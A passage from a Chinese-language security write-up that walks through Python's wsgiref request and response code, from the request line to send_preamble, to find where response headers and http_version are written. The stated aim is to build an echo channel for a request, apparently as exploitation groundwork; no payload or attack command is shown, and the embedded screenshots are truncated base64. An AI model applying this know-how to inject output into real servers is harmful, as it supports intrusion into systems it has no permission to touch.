<span class=n>self</span><span class=o>.</span><span class=na>raw_requestline</span> <span class=o>=</span> <span class=n>self</span><span class=o>.</span><span class=na>rfile</span><span class=o>.</span><span class=na>readline</span><span class=o>(</span><span class=mi>65537</span><span class=o>)</span>
|
|||
|
|
<span class=k>if</span> <span class=n>len</span><span class=o>(</span><span class=n>self</span><span class=o>.</span><span class=na>raw_requestline</span><span class=o>)</span> <span class=o>></span> <span class=mi>65536</span><span class=o>:</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>requestline</span> <span class=o>=</span> <span class=err>''</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>request_version</span> <span class=o>=</span> <span class=err>''</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>command</span> <span class=o>=</span> <span class=err>''</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>send_error</span><span class=o>(</span><span class=mi>414</span><span class=o>)</span>
|
|||
|
|
<span class=k>return</span>
|
|||
|
|
|
|||
|
|
<span class=k>if</span> <span class=n>not</span> <span class=n>self</span><span class=o>.</span><span class=na>parse_request</span><span class=o>():</span> <span class=err>#</span> <span class=n>An</span> <span class=n>error</span> <span class=n>code</span> <span class=n>has</span> <span class=n>been</span> <span class=n>sent</span><span class=o>,</span> <span class=n>just</span> <span class=n>exit</span>
|
|||
|
|
<span class=k>return</span>
|
|||
|
|
|
|||
|
|
<span class=n>handler</span> <span class=o>=</span> <span class=n>ServerHandler</span><span class=o>(</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>rfile</span><span class=o>,</span> <span class=n>self</span><span class=o>.</span><span class=na>wfile</span><span class=o>,</span> <span class=n>self</span><span class=o>.</span><span class=na>get_stderr</span><span class=o>(),</span> <span class=n>self</span><span class=o>.</span><span class=na>get_environ</span><span class=o>(),</span>
|
|||
|
|
<span class=n>multithread</span><span class=o>=</span><span class=n>False</span><span class=o>,</span>
|
|||
|
|
<span class=o>)</span>
|
|||
|
|
<span class=n>handler</span><span class=o>.</span><span class=na>request_handler</span> <span class=o>=</span> <span class=n>self</span> <span class=err>#</span> <span class=n>backpointer</span> <span class=k>for</span> <span class=n>logging</span>
|
|||
|
|
<span class=n>handler</span><span class=o>.</span><span class=na>run</span><span class=o>(</span><span class=n>self</span><span class=o>.</span><span class=na>server</span><span class=o>.</span><span class=na>get_app</span><span class=o>())</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>然后 run 方法是具体的实现</p>
|
|||
|
|
<p><a id=img6 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160347-f3cdf81e-b53a-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>然后一看就是在 finish_response 方法,重点很像,可以看到和 flask 一样应该都是在 write 方法</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=k>try</span><span class=o>:</span>
|
|||
|
|
<span class=k>if</span> <span class=n>not</span> <span class=n>self</span><span class=o>.</span><span class=na>result_is_file</span><span class=o>()</span> <span class=n>or</span> <span class=n>not</span> <span class=n>self</span><span class=o>.</span><span class=na>sendfile</span><span class=o>():</span>
|
|||
|
|
<span class=k>for</span> <span class=n>data</span> <span class=n>in</span> <span class=n>self</span><span class=o>.</span><span class=na>result</span><span class=o>:</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>write</span><span class=o>(</span><span class=n>data</span><span class=o>)</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>finish_content</span><span class=o>()</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>跟进 write 方法<br>
|
|||
|
|
这里如何选择跟进什么方法其实只要一个宗旨,构造我们的回显和解析我们的请求</p>
|
|||
|
|
<p><a id=img7 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160343-f13bd850-b53a-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>跟进 send_headers 方法</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>def</span> <span class=nf>send_headers</span><span class=o>(</span><span class=n>self</span><span class=o>):</span>
|
|||
|
|
<span class=s>"""Transmit headers to the client, via self._write()"""</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>cleanup_headers</span><span class=o>()</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>headers_sent</span> <span class=o>=</span> <span class=n>True</span>
|
|||
|
|
<span class=k>if</span> <span class=n>not</span> <span class=n>self</span><span class=o>.</span><span class=na>origin_server</span> <span class=n>or</span> <span class=n>self</span><span class=o>.</span><span class=na>client_is_modern</span><span class=o>():</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>send_preamble</span><span class=o>()</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>(</span><span class=n>bytes</span><span class=o>(</span><span class=n>self</span><span class=o>.</span><span class=na>headers</span><span class=o>))</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>一开始以为跟过了,看见 cleanup_headers 方法了</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>def</span> <span class=nf>cleanup_headers</span><span class=o>(</span><span class=n>self</span><span class=o>):</span>
|
|||
|
|
<span class=s>"""Make any necessary header changes or defaults</span>
|
|||
|
|
|
|||
|
|
<span class=s>Subclasses can extend this to add other defaults.</span>
|
|||
|
|
<span class=s>"""</span>
|
|||
|
|
<span class=k>if</span> <span class=err>'</span><span class=n>Content</span><span class=o>-</span><span class=n>Length</span><span class=err>'</span> <span class=n>not</span> <span class=n>in</span> <span class=n>self</span><span class=o>.</span><span class=na>headers</span><span class=o>:</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>set_content_length</span><span class=o>()</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>原来只是初始化我们必要的 header<br>
|
|||
|
|
跟进 send_preamble 方法</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>def</span> <span class=nf>send_preamble</span><span class=o>(</span><span class=n>self</span><span class=o>):</span>
|
|||
|
|
<span class=s>"""Transmit version/status/date/server, via self._write()"""</span>
|
|||
|
|
<span class=k>if</span> <span class=n>self</span><span class=o>.</span><span class=na>origin_server</span><span class=o>:</span>
|
|||
|
|
<span class=k>if</span> <span class=n>self</span><span class=o>.</span><span class=na>client_is_modern</span><span class=o>():</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>((</span><span class=err>'</span><span class=n>HTTP</span><span class=o>/%</span><span class=n>s</span> <span class=o>%</span><span class=n>s</span><span class=err>\</span><span class=n>r</span><span class=err>\</span><span class=n>n</span><span class=err>'</span> <span class=o>%</span> <span class=o>(</span><span class=n>self</span><span class=o>.</span><span class=na>http_version</span><span class=o>,</span><span class=n>self</span><span class=o>.</span><span class=na>status</span><span class=o>)).</span><span class=na>encode</span><span class=o>(</span><span class=err>'</span><span class=n>iso</span><span class=o>-</span><span class=mi>8859</span><span class=o>-</span><span class=mi>1</span><span class=err>'</span><span class=o>))</span>
|
|||
|
|
<span class=k>if</span> <span class=err>'</span><span class=n>Date</span><span class=err>'</span> <span class=n>not</span> <span class=n>in</span> <span class=n>self</span><span class=o>.</span><span class=na>headers</span><span class=o>:</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>(</span>
|
|||
|
|
<span class=o>(</span><span class=err>'</span><span class=n>Date</span><span class=o>:</span> <span class=o>%</span><span class=n>s</span><span class=err>\</span><span class=n>r</span><span class=err>\</span><span class=n>n</span><span class=err>'</span> <span class=o>%</span> <span class=n>format_date_time</span><span class=o>(</span><span class=n>time</span><span class=o>.</span><span class=na>time</span><span class=o>())).</span><span class=na>encode</span><span class=o>(</span><span class=err>'</span><span class=n>iso</span><span class=o>-</span><span class=mi>8859</span><span class=o>-</span><span class=mi>1</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=o>)</span>
|
|||
|
|
<span class=k>if</span> <span class=n>self</span><span class=o>.</span><span class=na>server_software</span> <span class=n>and</span> <span class=err>'</span><span class=n>Server</span><span class=err>'</span> <span class=n>not</span> <span class=n>in</span> <span class=n>self</span><span class=o>.</span><span class=na>headers</span><span class=o>:</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>((</span><span class=err>'</span><span class=n>Server</span><span class=o>:</span> <span class=o>%</span><span class=n>s</span><span class=err>\</span><span class=n>r</span><span class=err>\</span><span class=n>n</span><span class=err>'</span> <span class=o>%</span> <span class=n>self</span><span class=o>.</span><span class=na>server_software</span><span class=o>).</span><span class=na>encode</span><span class=o>(</span><span class=err>'</span><span class=n>iso</span><span class=o>-</span><span class=mi>8859</span><span class=o>-</span><span class=mi>1</span><span class=err>'</span><span class=o>))</span>
|
|||
|
|
<span class=k>else</span><span class=o>:</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>((</span><span class=err>'</span><span class=n>Status</span><span class=o>:</span> <span class=o>%</span><span class=n>s</span><span class=err>\</span><span class=n>r</span><span class=err>\</span><span class=n>n</span><span class=err>'</span> <span class=o>%</span> <span class=n>self</span><span class=o>.</span><span class=na>status</span><span class=o>).</span><span class=na>encode</span><span class=o>(</span><span class=err>'</span><span class=n>iso</span><span class=o>-</span><span class=mi>8859</span><span class=o>-</span><span class=mi>1</span><span class=err>'</span><span class=o>))</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>这也是我们的源头,可以看见 http_version 就是在这里赋值的</p>
|
|||
|
|
<p><a id=img8 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160336-ed628666-b53a-1.png><img src="data:image/png;base64,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